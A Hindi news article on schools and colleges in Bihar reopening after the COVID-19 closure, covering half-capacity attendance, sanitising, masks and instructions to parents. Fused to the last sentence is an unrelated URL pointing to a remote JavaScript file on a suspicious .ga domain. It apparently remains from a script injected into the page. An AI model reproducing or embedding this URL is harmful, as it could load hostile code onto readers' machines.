खुल गए हैं शिक्षण संस्था अभिभावक जान लें गाइडलाइन के संबंध में।

 

 

 

बिहार,( कुलसूम फात्मा )   पूरे देश में कोरोना महामारी का असर सभी राज्यों पर पडा़ जिनमें से बिहार राज्य भी एक है महामारी संकट के कारण बिहार राज्य के स्कूलों को बंद कर दिया गया था। परंतु स्थितियां समभली नज़र आ रही हैं जिसके कारण वर्तमान समय में निर्णय लिया गया है की स्कूल कोचिंग तथा कॉलेज को पुनः खोला जाए। यह स्कूल कोचिंग और कॉलेज तकरीबन 296 दिन के पश्चात अब खुलेंगे।

 

 

बिहार राज्य के कोचिंग स्कूल तथा कॉलेज एक बार फिर से खुलने जा रहे हैं। यहां पर बच्चों की आवाज़ फिर से सुनाई पडे़गी बता दें की यह स्कूल 14 मार्च को बंद हो गए थे। वर्तमान समय में इनको खोलने का निर्णय लिया जा चुका है। बच्चे शिक्षकों तथा कर्मचारियों को कोरोना से सुरक्षा का पालन करना अनिवार्य कर दिया गया है। यह स्कूल खोले तो जाएंगे परंतु इसमें 50% ही बच्चे आ सकेंगे और गाइड लाइन का इनको पालन करना अनिवार्य होगा

 

 

सोमवार, आज से यह कक्षाएं चलना प्रारंभ हो गई है । कोचिंग स्कूल और कॉलेज में इसकी पूर्ण रूप से तैयारी कर ली जा चुकी है। स्कूलों में शेड्यूल भी तैयार कर दिया गया है। यह स्कूल सुबह के समय 8:30 बजे से खुलेंगे और अधिकतर स्कूल 5 से 6 घंटे ही चलेंगे। स्कूल में ना तो असेंबली वर्तमान समय में होगी और ना ही खेल पीरियड लगेगा। स्कूल में छात्र तथा छात्राओं की अधिक संख्या में एक जगह ग्रुप नहीं बनेगा। इसके लिए लंच के वक्त अलग-अलग इनको रखा जाएगा। लंच में पैकेट फूड लेकर बच्चे आये निर्देश दिए गये है। यह निर्देश स्कूलों की तरफ से अभिभावकों को भी भेजा जा चुका है।

 

 

 

कोरोना महामारी से बचाव के लिए रविवार के दिन पटना के जिला शिक्षा कार्यालय तथा स्कूल एसोसिएशन की एक मीटिंग हुई। इसमें स्कूल प्रशासन को कोरोना से बचाव संबंधी गाइडलाइन के बारे में बताया गया और पालन का निर्देश दिया गया। दूसरी तरफ स्कूल में संक्रमण से बचने के लिए उपाय भी बताए गए ज्योति कुमार से जब बातचीत हुई तो उन्होंने बताया के हर स्कूल को पूरी तरीके से प्रिकॉशन ज़रूरी होगा जिससे के बच्चों पर महामारी का असर ना पड़े।

 

 

जानिए गाइडलाइन के संबंध में

 

 

रविवार के दिन जिन स्कूलों ने छात्रों को बस की सुविधा दी है, ऐसी बसों को सेनिटाइज़ कराया गया। बस में ड्राइवर को मास्क में रहने के लिए निर्देश दिये गये है। छात्रों के लिए 1 से 2 फीट की दूरी रखी जाए। गाइडलाइन के अंतर्गत निर्देश दिये गये है। प्रत्येक छात्र मास्क में रहेगा। इसके साथ ही एक-दूसरे से बातचीत करने पर भी पाबंदी लगाई गई है जिससे की सोशल डिस्टेंस बना रहे हैं। बाल्डविन एकेडमी के प्रचार राजीव रंजन से जब बातचीत हुई तो उन्होंने बताया की बस में एहतियात से संबंधित निर्देश सभी छात्रों को भेजे जा चुके हैं।

खास बात –

 

नाट्रेडम एकेडमी तथा डान बास्को एकेडमी में सिर्फ 10वीं तथा 12वीं बोर्ड परीक्षार्थियों को ही बुलाया गया है जिससे कि स्कूल में जनवरी की 4 तारीख से प्री बोर्ड की परीक्षा प्रारंभ कराई जा सके। वहीं डीएवी बीएसईबी में जनवरी की 5 तारीख से खोला जाएगा।

 

 

पेरेंट्स को दिए गए निर्देश।

 

 

अभिभावकों को निर्देश दिया गया के छात्रों को शेड्यूल के अनुसार ही स्कूल भेजें

और गल्व्स तथा मास्क तथा वाटर बोतल दे करके भेजें।

बैग में हैंड सैनिटाइजर रख दे और मास्क भी अवश्य रखें।

दूसरी तरफ स्कूल में छात्र एक दूसरे के मध्य कुछ भी शेयर ना करें। इसकी जानकारी दें।

अपने बच्चों को इसके साथ टिफिन बॉक्स घर का बना हुआ ही देकर भेजें।

स्कूल को हर दिन सेनिटाइज़ कराया जाएगा।

50% छात्रों को सब्जेक्ट रोल नंबर के अनुसार ही बुलाया जाएगा।

रविवार को स्कूल खोलने से पूर्व अभिभावकों से परमिशन। ली जाएगी।

प्रत्येक दिन प्रयोगशाला पुस्तकालय शौचालय को सेनिटाइज़ किया जाएगा।

अगर किसी शिक्षक को खासी या फिर बुखार हो जाता है तो उन्हें स्कूल नहीं बुलाया जाएगा।

हाथ धोने के लिए हैंडवाश अवश्य रखा जाएगा।

 

 

सोमवार से स्कूल खुल जाएंगे। मतलब के आज से स्कूल का खुलना प्रारंभ हो गया है। स्कूल में कोरोना की गाइडलाइन का पालन भी हो रहा है। इसके लिए डीईओ के साथ रविवार को मीटिंग हुई। इसमें स्कूल प्रशासन के साथ-साथ अभिभावकों के लिए गाइडलाइन भी पूर्ण रुप से तैयार की गई और सभी अभिभावकों को गाइडलाइन भेजी जा चुकी है।https://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.